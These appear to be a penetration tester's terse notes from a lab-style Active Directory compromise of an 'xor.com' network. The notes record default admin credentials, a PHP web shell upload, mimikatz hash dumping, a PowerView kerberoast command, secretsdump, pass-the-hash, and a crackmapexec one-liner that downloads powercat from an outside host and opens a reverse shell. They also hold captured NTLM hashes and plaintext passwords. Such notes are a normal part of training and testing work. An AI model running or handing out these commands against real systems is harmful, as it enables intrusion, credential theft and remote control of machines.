------------------
NOTES
------------------

After the foothold, look to get system, look for user hashes, pass the hash or kerberoast

Foothold
.123 - /books - admin@xor.com:admin
upload php shell to images
pull hashes from mimiiiiii

Administrator:3fee04b01f59a1001a366a7681e95699
XOR-APP59$:5fd668a1e7744519a90e51085bfd88fe

wayyyy easier to kerberoast with powerview on the system shell
	Import-Module powerview.ps1; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash.txt

sqlServer:shantewhite

secretsdump.py xor.com/sqlServer@10.11.1.121
	prompted for password (which i have)

mimikatz on .121 is too new and will break
older version https://gitlab.com/kalilinux/packages/mimikatz/-/blob/d72fc2cca1df23f60f81bc141095f65a131fd099/x64/mimikatz.exe

daisy password is hashed and inplain text

daisy:XorPasswordIsDead17
evil-winrm with daisy's creds, always try each protocol

easier powercat + cme reverseshell one liner
crackmapexec winrm 10.11.1.120 -u david -H d4738e8c31d43e0147f27894a20e6683 -x "powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.119.173/powercat.ps1'); powercat -c 192.168.119.173 -p 4444 -e powershell.exe"

